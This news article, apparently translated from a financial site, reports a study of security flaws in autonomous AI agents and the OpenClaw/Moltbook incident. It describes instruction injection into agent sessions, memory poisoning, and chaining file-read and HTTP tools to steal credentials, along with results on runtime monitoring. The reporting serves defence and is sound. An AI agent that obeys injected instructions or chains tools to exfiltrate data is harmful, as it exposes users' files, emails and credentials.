91% have vulnerabilities, 94% can be poisoned—AI Agent security is a "mess"

```

Autonomous AI Agents are penetrating healthcare, finance, and enterprise operations at an astonishing rate. Yet, the largest security study to date reveals: the vast majority of Agents running in production environments contain severe vulnerabilities, and current mainstream security evaluation methods are nearly powerless against them.

Recently, a joint research team from Stanford University, MIT CSAIL, Carnegie Mellon University, ITU Copenhagen, and NVIDIA found that among 847 evaluated autonomous agent deployments, 91% had toolchain attack vulnerabilities, 89.4% experienced goal drift after about 30 steps, and 94% of memory-augmented agents faced "poisoning" risks. The study identified a total of 2,347 previously unknown vulnerabilities, 23% of which were rated as severe.

Owen Sakawa, the lead author, cites the "OpenClaw/Moltbook incident" in early 2026 to prove this threat is no longer theoretical: A single vulnerability in Moltbook's platform database led to 770,000 active AI Agents on the platform being simultaneously compromised, each holding privileged access to their users' devices, emails, and files. "This is no longer a hypothetical threat," Sakawa said.

This serves as a direct warning to companies and investors rapidly deploying AI Agents: current mainstream security evaluation frameworks are designed around stateless language models and cannot detect emergent multistep combinatorial vulnerabilities, meaning many enterprises may systematically misjudge the real security status of their AI Agents. U.S. cognitive psychology and AI expert Gary Marcus commented, “Autonomous agents are an utter mess.”

Vulnerability Map: Six Types of Attacks, 2,347 Known Weaknesses

The study covers four major industries: healthcare (289 deployments, 34.1%), finance (247, 29.2%), customer service (198, 23.4%), and code generation (113, 13.3%).

The study established a six-category vulnerability classification system for autonomous agents, including goal drift and instruction attenuation, planner-executor desync, tool privilege escalation, memory poisoning, silent multistep policy violation, and delegation failure.

In production environment evaluations, state manipulation led with 612 instances (26.1% of total), followed closely by goal drift (573 instances, 24.4%). Misuse of tools and chained calls ranked third in total (489 instances), but had the highest severity—198 instances were rated severe, the highest of all categories.

Other alarming key numbers: 67% of agents experience goal drift after 15 steps, 84% cannot maintain security policies across sessions, 73% lack state poisoning detection mechanisms, and 58% have temporal consistency vulnerabilities. The study also found that memory poisoning effects typically appear in the 3.7th session after initial injection, significantly increasing the difficulty of security detection.

Real-World Case: 770,000 Agents Compromised Simultaneously

The OpenClaw (formerly Clawdbot and Moltbot) case provides the most direct real-world validation of these threat models.

This open-source AI Agent, developed by Austrian developer Peter Steinberger and released in November 2025, quickly garnered over 160,000 GitHub stars and features autonomous email sending, schedule management, terminal command execution, code deployment, and persistent memory across sessions.

Security firm Astrix Security used its custom scan tool ClawdHunter to find 42,665 OpenClaw instances exposed on public networks, 8 of which were completely open with no authentication.

According to VentureBeat, Cisco’s AI security research team described OpenClaw as “breakthrough in capability, but a security nightmare.” Kaspersky’s January 2026 security audit identified 512 vulnerabilities, 8 of them rated severe.

The sequence of events in the Moltbook incident was particularly typical.

This social platform, built for OpenClaw Agents, spread virally and attracted over 770,000 Agent registrations—users would inform their Agent of Moltbook, and the Agent would autonomously complete registration.

Afterwards, a platform database vulnerability allowed attackers to bypass authentication and directly inject instructions into any Agent session, exposing all 770,000 Agents—each with privileged access to user devices—to risk. The research team identified this as the first documented large-scale cross-Agent attack propagation event.

The “lethal trifecta” described by security researcher Simon Willison was fully reflected in OpenClaw: the ability to access private data, exposure to untrusted content, and external communication channels, combined to make autonomous agents an ideal springboard for attackers.

Architectural Flaws: Why Are AI Agents More Vulnerable Than LLMs?

The core conclusion of the research is this: the security challenges for autonomous agents are fundamentally different from those for stateless language models.

Security evaluation for language models focuses on “can the model say something unsafe”; for AI Agents, the issue becomes “can the model do something unsafe”—including real-world tool calls, state modifications affecting future behavior, and violations that emerge only over multiple steps.

The research illustrates this logic with specific scenarios: An Agent with both file read (read_file) and HTTP request (http_request) permissions has individually compliant access control decisions for each tool, but their combination enables data theft—credentials are read from configuration files and sent externally via HTTP request. Each step conforms to local security policy, but together achieves an adversarial goal. The study calls this the "compositional safety" problem.

In controlled architecture research, researchers tested four mainstream architectures: ReAct agents, multi-agent systems, memory-augmented agents, and tool-using agents.

The results show that privilege escalation attacks against tool-using agents succeed 95% of the time, and poisoning attacks against memory-augmented agents succeed 94% of the time.

Even with the highest resilience, multi-agent systems still suffer 58% attack success rates for goal drift—researchers thus judged that none of the tested architectures are sufficiently resistant to adversarial deployments.

Adaptive attack generation tests further increased concerns: reinforcement learning-generated attack violation rates reached 79%, 25.4% higher than the 63% seen in manually designed scenarios, indicating the threat space facing AI Agents exceeds the boundaries of human red team testing.

Direct Impact on Enterprise Deployment: Protection Frameworks Remain Immature

Based on empirical results, the research team proposed minimum security baselines: enforced runtime monitoring for all production Agents; manual approval requirements for toolchain operations involving data access or external communication; mandatory human review triggered every 20–25 steps, to address virtually inevitable goal drift with increased steps; memory-augmented Agents must encrypt and check integrity of persistent states.

In terms of monitoring effectiveness, the study shows action-level monitoring (single-step detection) reached a precision of 0.94, sequence-level monitoring (multistep chain detection) an F1 score of 0.85, and state-level monitoring an F1 score of 0.83. In a 30-day runtime monitoring test of 127 production Agents, the system intercepted 4,782 operations while keeping false positives at 3.7%, and 14.6% of flagged operations were confirmed as real attacks.

The study also points out that current "AI governance" methods are fundamentally misaligned: existing frameworks are mostly post-hoc audits, not real-time compliance constraints during execution.

With the EU AI Act, U.S. NIST AI Risk Management Framework, and other regulatory requirements taking effect, both regulatory pressure and security risk for enterprises are rising together. Given widespread deployment of AI Agents in high-risk business scenarios, the lack of security infrastructure is becoming a systemic risk that cannot be ignored in this wave of AI commercialization.

Risk Warning and DisclaimerThe market is risky and investments should be cautious. This article does not constitute personal investment advice, nor does it take into account any user’s special investment objectives, financial situation, or needs. Users should consider whether any opinions, views, or conclusions herein are suitable for their particular circumstances. Investments based on this are at your own risk. ```